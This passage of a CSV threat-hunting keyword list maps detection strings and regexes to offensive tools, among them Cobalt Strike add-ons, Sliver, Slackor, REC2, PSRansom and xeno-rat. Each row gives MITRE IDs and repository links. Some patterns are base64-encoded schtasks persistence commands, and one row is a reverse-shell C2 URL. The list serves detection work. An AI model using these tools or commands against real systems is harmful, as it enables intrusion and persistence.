TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd*",".{0,1000}c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C2FunctionAgent*",".{0,1000}C2FunctionAgent.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","#useragent","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*c2hlbGxjb2Rl*",".{0,1000}c2hlbGxjb2Rl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*c2lint *",".{0,1000}c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*C2ListenerPort*",".{0,1000}C2ListenerPort.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*c2-logs.txt*",".{0,1000}c2\-logs\.txt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m*",".{0,1000}c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c2profile.profile*",".{0,1000}c2profile\.profile.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*C2ProfileManager.*",".{0,1000}C2ProfileManager\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*C2ProfileResponse.cs*",".{0,1000}C2ProfileResponse\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*-c2-randomizer.py*",".{0,1000}\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*C2ReverseClint*",".{0,1000}C2ReverseClint.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2ReverseProxy*",".{0,1000}C2ReverseProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2ReverseServer*",".{0,1000}C2ReverseServer.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2script/proxy.*",".{0,1000}C2script\/proxy\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2Server by @JoelGMSec*",".{0,1000}C2Server\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*'c2server'*",".{0,1000}\'c2server\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*C2Server.cs*",".{0,1000}C2Server\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*c2-server.mtattab.com/reverseShellClients*",".{0,1000}c2\-server\.mtattab\.com\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*C2Server.ps1*",".{0,1000}C2Server\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","10","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*c2server_arm_musl*",".{0,1000}c2server_arm_musl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_armv7*",".{0,1000}c2server_armv7.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_debug*",".{0,1000}c2server_debug.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_linux*",".{0,1000}c2server_linux.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_macos*",".{0,1000}c2server_macos.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_release*",".{0,1000}c2server_release.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_windows*",".{0,1000}c2server_windows.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2-sessions ping*",".{0,1000}c2\-sessions\sping.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*c2-sessions quit*",".{0,1000}c2\-sessions\squit.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*C2TaskMessage.*",".{0,1000}C2TaskMessage\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*c2VydmVyMS5jaWEuZ292*",".{0,1000}c2VydmVyMS5jaWEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*C2WebSocketHandler.*",".{0,1000}C2WebSocketHandler\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6*",".{0,1000}c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908*",".{0,1000}c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036*",".{0,1000}c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*C34208EA-8C33-473D-A9B4-53FB40347EA0*",".{0,1000}C34208EA\-8C33\-473D\-A9B4\-53FB40347EA0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e*",".{0,1000}c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*C346B912-51F2-4A2E-ACC3-0AC2D28920C6*",".{0,1000}C346B912\-51F2\-4A2E\-ACC3\-0AC2D28920C6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8*",".{0,1000}c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 